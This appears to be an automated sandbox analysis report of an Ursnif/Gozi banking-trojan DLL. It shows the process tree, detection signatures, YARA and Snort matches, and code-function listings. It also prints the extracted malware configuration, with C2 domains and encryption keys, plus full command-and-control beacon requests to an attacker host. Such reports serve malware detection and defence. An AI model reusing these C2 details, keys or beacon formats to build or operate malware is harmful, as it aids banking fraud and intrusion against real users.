Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3b17.dll

Overview

General Information

Sample Name:3b17.dll
Analysis ID:444315
MD5:3b17fcc55cee8cbe4cd1b443f358c36d
SHA1:45d1e652f282a94b37ac32afb62ff563afb2fb39
SHA256:9ae13bdb906bf774982242a378a20fb25da3e29dd7b5e1acd2531562319edba6
Tags:dllgozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4876 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3b17.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3868 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4576 cmdline: rundll32.exe 'C:\Users\user\Desktop\3b17.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 244 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Seasonthing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5928 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Seatforce MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3012 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Spaceclose MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5912 cmdline: rundll32.exe C:\Users\user\Desktop\3b17.dll,Time MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 3472 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4792 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 2996 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3472 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.54194a0.4.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security
              3.3.rundll32.exe.54194a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security
                0.2.loaddll32.exe.30194a0.2.raw.unpackJoeSecurity_UrsnifYara detected UrsnifJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Jbx Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000003.00000003.286056842.0000000000800000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "ESo3IAssZzE5ysG1EIw/4HtXAsFSsy8tqEpVxnbfbMCCYrlFNqq+URa5v25Vb8Fqg7CHgZW6+XrIJ25ylHpxuJ37IEqPduLid4tbupuJSyqgtTppR4zn02IvafAxKMAHSa619wHPy17p4K0/4kj7C1qaKtM+Xh1a06NCKm5N+m786e7cPquu7R927nhH6gnnNo+As4++HjROKgvXHXtuBEcH4AtLrYsdhCKBIunRJ4/JRjUYKn0tSnPBDf+Na9jWpvJHGTOYnu1CoHdLJTA2dOf5StD7LA6zUT/gtRsdQh+Fypc8IFyYvOY0WUwFr+dLMrtodQ8p5Mt7Wi/ACSlplY8XX2NGugFn+jyVYhw+Opw=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "6000", "server": "580", "serpent_key": "PNJeXnLTijShJqmR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: 3b17.dllMetadefender: Detection: 22%Perma Link
                  Source: 3b17.dllReversingLabs: Detection: 55%
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_00E839C5
                  Source: 3b17.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                  Source: 3b17.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: c:\418\521\Condition\lake\Free_yet\Sky.pdb source: 3b17.dll

                  Networking:

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49721 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49721 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49723 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49728 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49733 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49733 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49734 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49736 -> 165.232.183.49:80
                  Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49736 -> 165.232.183.49:80
                  Source: Joe Sandbox ViewASN Name: ALLEGHENYHEALTHNETWORKUS ALLEGHENYHEALTHNETWORKUS
                  Source: global trafficHTTP traffic detected: GET /TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/BeoUjWvi9/GRgtTT2_2Fre8pZfIDlE/fPFOTkpE85cBWdt2Aor/5Y_2FWklStfFd9eU3TULSv/7l6H_2BVDc6Tn/LKJndKHH/PFJdkVMTIBMr500KWPhrAdO/8KvhNtw8HT/7mBX52dH5SplZXRyl/g96OGJKS4dVz/jB8OfmZgeb2/W3zD8P6To_2Fz1/V_2BecT6OliET_2F_2Boh/g6HDdicMqOjqFGcv/ETnCqudWareoM50/LlKXg0AU/cEv179y_2/BaWO HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6b9FMvL_2FIqp4S/ewVNte36FW/XPExsAA8VeJEhvgVb/KCeGwDykzB_2/FfJMiTYYFkB/UqSvKjZpB_2FYe/tRxQkg5XCh4uQfiEclNaO/UTPObDJYz_2FyBjB/v_2F2pSU4VWX5Hz/N9QtHdwYZ4WUrzEx5D/Q3nFD_2F2/8Ujs0VBDGr49KJ6AsZSH/EgfscPlAK393eCGdmmF/FMztWz0QhrOgK4MYRsuNHe/_2BkNcUEELtfv/x0cjHdMa17k7/_2FjZKD HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_2FuI_2FqZ2s_2FiaO0J_/2FTRLU31mRGflU2b/ZIJ0FncJBL1ujMu/UAyv0uh4NdsHQb_2Fp/7IlErLThx/qx9lbHRBIr_2BN2fcH7p/3MZS8xBk2HV8HO_2FwY/sjaecD1Ad9d4_2Bhfj7Udw/txqy4ndWQ8c2I/i_2FDCoi/J8FwQUA7HNUWWZ74vTmq4PN/8fRY05oVkC/eLBfQLcjbzJ0zm8P9/lrnxZ8213Jiq/fQMuhQcrOSv/_2FzhSntnuW3P7/C3J8_2BPrwDMXrvKewIwt/CP9ILXpGj47Z_2/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /LQ0ImNchzaabH7Vdh_/2FtRScd2v/QQzFkXdgAhow_2FcWrEP/n3sYFzsTbYVS3adrQdv/5Nzc_2BoRJpkAsHtAz6xV3/PsE8tlG0HHtLJ/T5TqRkda/BLQo9v_2FZTJ_2FPNHoYsv1/ye7M3znq3j/msHJ000mSBJHPb7nZ/E46dHTxH_2B4/eeBIrQKxL9Y/THDXKoks2pteky/rz_2F_2F0HzAFdHANfOc3/VtFiNo945_2BUObZ/oZuZG5t2mblYFyG/ygnFakJ2W33SNUuycB/j7wv4YZIa/0Hblow_2BZFOik2zX2YB/PXGpfOrjekSAdA19ARh/ahTrlQtp6MFSLYtpjwx_2B/D_2FHvRt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /s96BBj_2BW0E7I/inPV3RC1ndWtP3TCiXWoq/7JGd2eicozVaSDqP/TIPKarKtLPkYLRx/VCo8CEXU6VSxFW20ap/EmssX5YuH/_2FmT3PaMcthev94lCLF/bWDeiN4zbJE6pfv8oTi/Qb34wmcConjidXNcLSenBo/rqyTVIe8oNi_2/FtqR6e_2/BJ_2F_2Ff8F8rmDwirrIz3L/Nk4szxk3_2/FsoXecNAHbdXzRM5b/qnqXpzn3ytbn/lcXf0S9I54h/nPX849yJE9mtRH/Mg8GQncb8LaArkE96Imgo/T60bsdjLtZH_2FnO/zpiezRZpQAYC8v0/MRTN6xcxZf9LqzW6jmrO/pZ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /J7P_2BuFqD/6ho97HFr4RP0mXM5H/ZrJ1_2BByY5Q/ab42fK_2F4S/vR5_2FWZ9gdHVf/hFgLjlRclm4jOH5T1Dh_2/Bb6OfmnpAwg0WKei/TGgUW067tNixzOx/BwPRLezaId9OtwPQlY/CkLoMrcdP/aOG78DSC7_2BjhPI9iFK/iN8ZMV2kpmYpR22nO5N/DPr4nIGLY40kIrg97zu5zK/lZpfj5ONzqtKf/Vl33ZktQ/u9goArPbUAC5CGM3eIqnvuS/s_2BLl3UAj/4ev_2F316DIi43v_2/FeCwH6Boab2B/JVucmKuDRDu/1ldPV7QmrKfn1O/3tEgr34mvlOov5etr8LcR/vS5_2Fy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gtr.antoinfer.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: gtr.antoinfer.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 05 Jul 2021 14:53:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                  Source: rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/IjC4EyiBxV/7uUoLMHVe5HqOMTwj/Y_2F9ou0UZzx/HwGYxCdSBjF/r3_2Fe8Khd4U7J/_
                  Source: loaddll32.exe, 00000000.00000002.471604423.0000000000C40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.474899511.0000000003360000.00000002.00000001.sdmpString found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC
                  Source: ~DFF4A7B0CDF51E1130.TMP.24.dr, {2403265A-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.drString found in binary or memory: http://gtr.antoinfer.com/L1_2Fim_2FjKecpJDs7/g1Qm6wFOdGvT5e_2FhpFOy/0nZ5BcruXqyR0/vaHKQACk/N0rC9vWI6
                  Source: rundll32.exe, 00000003.00000002.471774654.000000000087B000.00000004.00000020.sdmp, {24032658-DDEC-11EB-90E4-ECF4BB862DED}.dat.24.dr, ~DFDEC152A471305B20.TMP.24.drString found in binary or memory: http://gtr.antoinfer.com/TSVYq_2BhQPt7Rt8hvJk_/2BaPzRTN_2BosSeV/Hf1LtrPBkIb4xln/EiEQXon2wRV0GLivPg/B

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY

                  E-Banking Fraud:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 3.2.rundll32.exe.54194a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.54194a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.loaddll32.exe.30194a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.475659294.0000000003019000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461720444.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461743288.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451412627.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461645135.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451272209.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451228636.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451358001.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461813677.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461763055.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.469498928.0000000005419000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461780198.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451303744.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451380572.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461795856.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451325276.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.451398654.0000000005498000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.461674265.0000000003098000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.475651924.0000000002E9C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.478328621.0000000005419000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4876, type: MEMORY
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E839C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_00E839C5

                  System Summary:

                  barindex
                  Writes or reads registry keys via WMIShow sources
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Writes registry values via WMIShow sources
                  Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E191B9C GetProcAddress,NtCreateSection,memset,0_2_6E191B9C
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E191EC7 NtMapViewOfSection,0_2_6E191EC7
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E192485 NtQueryVirtualMemory,0_2_6E192485
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E82D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_00E82D06
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E88005 NtQueryVirtualMemory,3_2_00E88005
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1922640_2_6E192264
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1EB6170_2_6E1EB617
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F862F0_2_6E1F862F
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1ED6B00_2_6E1ED6B0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1E17270_2_6E1E1727
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1EDC200_2_6E1EDC20
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E208CB70_2_6E208CB7
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F05340_2_6E1F0534
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F8AA20_2_6E1F8AA2
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2162C00_2_6E2162C0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1EAB670_2_6E1EAB67
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E208B970_2_6E208B97
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1EE0500_2_6E1EE050
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F88610_2_6E1F8861
                  Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F917A0_2_6E1F917A
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E822063_2_00E82206
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E87DE03_2_00E87DE0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E831093_2_00E83109
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1EB6173_2_6E1EB617
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F862F3_2_6E1F862F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F96533_2_6E1F9653
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1ED6B03_2_6E1ED6B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F8F153_2_6E1F8F15
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1E17273_2_6E1E1727
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1EDC203_2_6E1EDC20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E208CB73_2_6E208CB7
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F8CD43_2_6E1F8CD4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F05343_2_6E1F0534
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F8AA23_2_6E1F8AA2
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2162C03_2_6E2162C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1EAB673_2_6E1EAB67
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E208B973_2_6E208B97
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F93EE3_2_6E1F93EE
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1EE0503_2_6E1EE050
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F88613_2_6E1F8861
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1F917A3_2_6E1F917A
                  Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E1DE9F0 appears 35 times
